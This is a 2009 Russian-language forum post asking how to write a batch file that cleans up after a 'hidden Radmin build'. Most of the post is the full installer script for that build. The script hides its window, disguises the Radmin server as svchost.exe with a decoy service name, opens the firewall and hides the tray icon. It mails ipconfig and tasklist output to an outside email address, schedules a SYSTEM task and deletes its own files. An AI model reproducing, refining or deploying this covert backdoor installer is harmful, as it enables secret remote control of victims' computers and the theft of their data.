Подчистка скрытого Radmin'a bat-ом

Подчистка скрытого Radmin'a bat-ом

08.12.2009, 22:53

the_apx

Новичок

Регистрация: 08.12.2009

Сообщений: 2

С нами: 8645353

Репутация: 0

Подчистка скрытого Radmin'a bat-ом

Как удалить установленную скрытую сборку Radmin'a bat файлом?

В bat файле установки стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.

А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из каталогов windows и system32? Тоесть автоматизировать это дело) Чтото вроде таблетки.

Буду весьма благодарен за помощь)

Текст bat файла сборки:

Код:

cmdow @ /HID


copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f user@mail.ru -u user -pw pass

ipconfig /all > %systemroot%/system32/ip.txt
tasklist > %systemroot%/system32/task.txt

blat.exe %systemroot%/system32/ip.txt -to user@mail.ru 
blat.exe %systemroot%/system32/task.txt -to user@mail.ru

schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat


del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat

𝕏 Twitter Reddit Telegram Копировать ссылку